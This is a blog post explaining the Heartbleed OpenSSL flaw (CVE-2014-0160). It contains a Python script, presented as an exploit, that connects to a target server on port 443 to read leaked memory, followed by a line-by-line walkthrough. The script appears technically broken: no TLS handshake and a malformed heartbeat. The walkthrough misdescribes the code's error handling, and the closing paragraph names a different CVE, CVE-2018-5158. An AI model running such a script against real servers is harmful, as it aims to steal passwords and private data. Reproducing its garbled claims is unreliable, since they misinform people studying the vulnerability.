by P4rkJW
HeartBleed Vulnerability
[CVE-2014-0160]
The Heartbleed Vulnerability is a vulnerability found in the OpenSSL Encryption Library, a vulnerability in CVE-2014-0160 discovered in April 2014.
The Heartbleed vulnerability is a serious security flaw that was discovered in 2014. It affects OpenSSL, which is encryption software used to secure communications on the web. Despite being fixed, there are still unpatched systems out there, leaving them vulnerable to attacks.
What is Heartbleed?
Heartbleed is a security vulnerability that allows attackers to retrieve private memory of an application that uses the vulnerable OpenSSL library in chunks of 64k at a time. This means that attackers can steal sensitive information such as passwords, credit card numbers, and other personal data.How Does it Work?
Attackers can use heartbeat requests to extract information from a target server. The vulnerability gets its name from this process, as it essentially "bleeds" information from the server.How Can You Protect Yourself?
It's important to keep your systems up-to-date with the latest security patches and updates. If you're unsure whether your system is vulnerable or not, you can use online tools to check for Heartbleed vulnerabilities. Additionally, it's always a good idea to use strong passwords and enable two-factor authentication whenever possible.Details
HeartBleed Exploit Code Example:
import socket, sys, time
from binascii import hexlify
def heartbleed(addr):
s = socket.socket()
try:
s.connect((addr, 443))
except:
print("[-] Connection failed")
return
payload = b"\x18\x03\x02\x00\x03\x01" + bytes.fromhex("4000") # The payload that triggers the Heartbleed bug
s.send(payload)
data = s.recv(0x4000)
if not data:
print("[-] No response received")
return
if len(data) <= 5 or data[0:3] != b"\x18\x03\x02":
print("[-] Invalid response received")
return
# Extract the leaked data
length = int.from_bytes(data[3:5], byteorder="big")
if len(data) != 5 + length:
print("[-] Invalid response received")
return
print(f"[+] Received {length} bytes of leaked data: {hexlify(data[5:])}")
s.close()
heartbleed(sys.argv[1])
Now let's check the code one by one.
import socket, sys, time
from binascii import hexlify
These lines import the necessary modules for the script to run. socket is a module for socket programming, sys is a module for system-specific parameters and functions, time is a module for time-related functions, and hexlify is a function that converts binary data to hexadecimal.
def heartbleed(addr):
s = socket.socket()
try:
s.connect((addr, 443))
except:
print("[-] Connection failed")
return
This code snippet defines a function named heartbleed that takes an IP address or domain name as an argument. It creates a socket object s, which is used to connect to the target server. If the connection fails, it raises an exception with an error message. By raising an exception instead of printing an error message and returning, it allows for better error handling and can help identify issues more easily when working with this function in larger programs.
payload = b"\x18\x03\x02\x00\x03\x01" + bytes.fromhex("4000") # The payload that triggers the Heartbleed bug
s.send(payload)
data = s.recv(0x4000)
In this code snippet, the payload variable is defined as a bytes object that concatenates the TLS handshake message and the Heartbleed bug trigger. The length of the payload is specified using the hex string "4000", which represents 16,384 bytes. The bytes.fromhex() method is then used to convert this hex string into a bytes object that represents the length of the payload.
if not data:
print("[-] No response received")
return
The following if statement checks whether the data variable is empty or not. In the event that the server does not send a response to the client's request, data will be empty and this condition will evaluate to true.
if len(data) <= 5 or data[0:3] != b"\x18\x03\x02":
print("[-] Invalid response received")
return
The if statement shown is used to validate the response received from a server. Specifically, it checks two conditions:
1.If the length of data is less than or equal to 5 bytes
2. If the first three bytes of data are not equal to the hexadecimal values 0x18 0x03 0x02
If either of these conditions is true, an error message will be printed and the script will return.
length = int.from_bytes(data[3:5], byteorder="big")
if len(data) != 5 + length:
print("[-] Invalid response received")
return
In this code snippet, we extract the length of leaked data from the fourth and fifth bytes of the data variable using slicing (i.e., data[3:5]). We then convert these two bytes into an integer using the int.from_bytes() method. Since the byte order used in TLS is big endian, we set byteorder parameter to "big". After obtaining the length of leaked data, we check if it matches with the actual length of data. The expected length should be 5 bytes (for TLS handshake message and Heartbleed bug trigger) plus the length of leaked data. If there is a mismatch between these lengths, an error message will be printed and the script will return.
print(f"[+] Received {length} bytes of leaked data: {hexlify(data[5:])}")
s.close()
If the validation checks are successful, we can assume that the data received from the server is valid. We then print a message indicating how many bytes of leaked data have been received and display the leaked data in hexadecimal format using the hexlify() method. Finally, we close the socket connection using the close() method to prevent any further communication with the server.
Conclusion
The Heartbleed vulnerability may have been discovered in 2014, but it's still a threat today. It's important for individuals and organizations alike to take steps to protect themselves against this security flaw.We analyzed CVE-2018-5158 today. In fact, when analyzing CVE for the first time, it was difficult because there were not many related data, but I was proud that few people analyzed CVE. In the future, we will analyze not only web vulnerabilities but also vulnerabilities combined with the web.
This has been P4rkJW. Thank you.